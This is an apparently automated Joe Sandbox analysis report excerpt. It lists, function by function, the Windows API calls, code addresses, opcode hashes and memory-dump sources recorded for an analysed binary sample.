                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                            • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                            • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                            • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                            • __isleadbyte_l.LIBCMT ref: 004208A6
                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                            • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                            • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                            • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                            APIs
                                                            • GetParent.USER32(?), ref: 004503C8
                                                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Proc$Parent
                                                            • String ID:
                                                            • API String ID: 2351499541-0
                                                            • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                            • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                            • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                            • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                            • TranslateMessage.USER32(?), ref: 00442B01
                                                            • DispatchMessageW.USER32(?), ref: 00442B0B
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchTranslate
                                                            • String ID:
                                                            • API String ID: 1795658109-0
                                                            • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                            • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                            • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                            • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                            • GetCaretPos.USER32(?), ref: 004743B2
                                                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                            • GetForegroundWindow.USER32 ref: 004743EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                            APIs
                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                            • _wcslen.LIBCMT ref: 00449519
                                                            • _wcslen.LIBCMT ref: 00449526
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_wcslen$_wcspbrk
                                                            • String ID:
                                                            • API String ID: 2886238975-0
                                                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __setmode$DebugOutputString_fprintf
                                                            • String ID:
                                                            • API String ID: 1792727568-0
                                                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                            APIs
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$AttributesLayered
                                                            • String ID:
                                                            • API String ID: 2169480361-0
                                                            • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                            • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                            APIs
                                                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                            • String ID: cdecl
                                                            • API String ID: 3850814276-3896280584
                                                            • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                            • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                            APIs
                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                            • gethostbyname.WSOCK32(?), ref: 0046D42D
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                            • _memmove.LIBCMT ref: 0046D475
                                                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 2502553879-0
                                                            • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                            • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                            • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                            • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                            APIs
                                                            • SendMessageW.USER32 ref: 00448C69
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                            APIs
                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastacceptselect
                                                            • String ID:
                                                            • API String ID: 385091864-0
                                                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                            • GetStockObject.GDI32(00000011), ref: 00430258
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                            • String ID:
                                                            • API String ID: 1358664141-0
                                                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 2880819207-0
                                                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
